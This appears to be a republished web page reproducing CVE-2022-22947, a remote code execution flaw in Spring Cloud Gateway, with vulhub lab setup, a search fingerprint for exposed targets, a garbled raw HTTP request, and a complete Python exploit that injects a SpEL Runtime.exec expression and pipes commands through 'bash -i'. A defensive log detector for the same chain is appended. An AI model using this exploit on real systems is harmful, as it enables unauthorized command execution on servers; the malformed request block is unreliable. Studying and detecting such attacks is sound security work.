
Spring Cloud Gateway remote code execution vulnerability reproduction (CVE-2022-22947)

Abide by the law

Any individual or organization using the network must abide by the Constitution and the law, observe public order, respect social morality, must not endanger network security, and must not use the network to engage in activities that endanger national security, honor and interests

Vulnerability description:

Spring Cloud Gateway is an API gateway in the Spring ecosystem. Versions up to and including 3.1.0 and 3.0.6 contain a SpEL expression injection vulnerability: when an attacker can reach the Actuator API, the flaw can be used to execute arbitrary commands.

Affected versions:

3.1.0, 3.0.0 through 3.0.6, and versions before 3.0.0

Case (asset fingerprint)

app="vmware-SpringBoot-framework"

Environment setup

# download the archive
wget https://github.com/vulhub/vulhub/archive/master.zip -O vulhub-master.zip
# unpack it
unzip vulhub-master.zip
# enter the vulhub directory for this CVE and start the vulnerable environment
cd vulhub-master/spring/CVE-2022-22947
docker-compose up -d
# once the environment is up, browse to
http://ip:8080/

Reproduction

POST /actuator/gateway/routes/WeianSec HTTP/1.1
Host: 162.14.69.165:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/json
Content-Length: 456

Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

exp
#!/usr/bin/env python3
import requests, json, sys, base64

#proxies = {'http':'http://127.0.0.1:8080','https':'http://127.0.0.1:8080'}

UA = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36'


def rce(url, cmd):
    h1 = {
        'User-Agent': UA,
        'Content-Type': 'application/json'
    }
    h2 = {'User-Agent': UA}
    # route definition whose filter argument carries the SpEL expression
    data = {
        "id": "ee",
        "filters": [{
            "name": "AddResponseHeader",
            "args": {
                "name": "Result",
                "value": "#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(\"" + cmd + "\").getInputStream()))}"
            }
        }],
        "uri": "http://aaaa.aa",
        "order": 0
    }

    # 1. add the route  2. refresh so the gateway evaluates it  3. read the route back
    res1 = requests.post('{}/actuator/gateway/routes/ee'.format(url), data=json.dumps(data, ensure_ascii=False), headers=h1, verify=False)  #, proxies=proxies)
    res2 = requests.post('{}/actuator/gateway/refresh'.format(url), headers=h2, verify=False)
    res3 = requests.get('{}/actuator/gateway/routes/ee'.format(url), headers=h2, verify=False)
    print(res3.text)


if __name__ == "__main__":
    if len(sys.argv) < 3:
        print('Usage: python cve-2022-22947.py url cmd')
        sys.exit(1)
    url = sys.argv[-2]
    if url[-1] == '/':
        url = url[:-1]
    cmd = sys.argv[-1]
    cmd = 'bash -c {echo,' + base64.b64encode(cmd.encode()).decode() + '}|{base64,-d}|{bash,-i}'
    if not (url.startswith('http://') or url.startswith('https://')):
        print('Usage: python cve-2022-22947.py url cmd')
        sys.exit(1)
    rce(url, cmd)
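From the defender's side, the chain above leaves a recognizable three-step trace: a POST that defines a route whose filter arguments contain a SpEL `#{...}` expression, a POST to /actuator/gateway/refresh, and a GET that reads the route back to collect the result. The following script is an added detection example, not part of the original write-up or of the exploit script; it walks constructed access-log records in order and reports that sequence. The record format (one dict per request with `src`, `method`, `path` and the JSON body of POST requests) is an assumption: Spring's default access log does not retain request bodies, so this presumes a reverse proxy or WAF in front of the gateway that logs them.

```python
import json
import re

# Endpoints used in the route-add / refresh / read-back sequence on this page.
ROUTE_PATH = re.compile(r"^/actuator/gateway/routes/([^/?]+)$")
REFRESH_PATH = "/actuator/gateway/refresh"
# Marker of a SpEL template expression inside a route definition string.
SPEL_MARKER = re.compile(r"#\{")

# Constructed sample records (assumed format: one dict per request, with the
# JSON body of POST requests retained; this is not Spring's default access log).
SAMPLE_LOG = [
    {"src": "203.0.113.10", "method": "POST", "path": "/actuator/gateway/routes/ee",
     "body": '{"id": "ee", "filters": [{"name": "AddResponseHeader", '
             '"args": {"name": "Result", "value": "#{1+1}"}}], '
             '"uri": "http://aaaa.aa", "order": 0}'},
    {"src": "203.0.113.10", "method": "POST", "path": REFRESH_PATH, "body": ""},
    {"src": "203.0.113.10", "method": "GET", "path": "/actuator/gateway/routes/ee", "body": ""},
    # Legitimate route change by an operator: a literal header value, no SpEL.
    {"src": "198.51.100.7", "method": "POST", "path": "/actuator/gateway/routes/orders",
     "body": '{"id": "orders", "filters": [{"name": "AddResponseHeader", '
             '"args": {"name": "X-Env", "value": "prod"}}], '
             '"uri": "http://orders.internal", "order": 1}'},
    {"src": "198.51.100.7", "method": "GET", "path": "/api/orders/1", "body": ""},
]


def spel_strings(obj):
    """Recursively collect every string in a parsed JSON value that contains '#{'."""
    if isinstance(obj, dict):
        return [s for v in obj.values() for s in spel_strings(v)]
    if isinstance(obj, list):
        return [s for v in obj for s in spel_strings(v)]
    if isinstance(obj, str) and SPEL_MARKER.search(obj):
        return [obj]
    return []


def analyze(records):
    """Return (src, path, reason) findings for the exploit chain, in log order."""
    findings = []
    spel_routes = set()  # route ids whose definition carried a SpEL expression
    for rec in records:
        method, path = rec["method"], rec["path"]
        m = ROUTE_PATH.match(path)
        if method == "POST" and m:
            try:
                body = json.loads(rec["body"]) if rec["body"] else {}
            except json.JSONDecodeError:
                findings.append((rec["src"], path, "route body is not valid JSON"))
                continue
            hits = spel_strings(body)
            if hits:
                spel_routes.add(m.group(1))
                findings.append((rec["src"], path, "SpEL in route definition: " + hits[0]))
        elif method == "POST" and path == REFRESH_PATH and spel_routes:
            findings.append((rec["src"], path,
                             "refresh after SpEL route(s): " + ", ".join(sorted(spel_routes))))
        elif method == "GET" and m and m.group(1) in spel_routes:
            findings.append((rec["src"], path, "read-back of SpEL route " + m.group(1)))
    return findings


if __name__ == "__main__":
    for src, path, reason in analyze(SAMPLE_LOG):
        print(f"{src} {path}: {reason}")
```

The operator's legitimate route change produces no finding because its filter value is a plain literal; the detector keys on the `#{` template marker anywhere in the submitted route, not on a specific payload, so it also catches variants that reach the same SpEL evaluation through a different filter or predicate. On a gateway where the actuator endpoint is not meant to be reachable at all, any request to /actuator/gateway/ from an untrusted source is already worth an alert on its own.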
Article URL: https://www.mshxw.com/it/770339.html

Copyright (c) 2021-2022 MSHXW.COM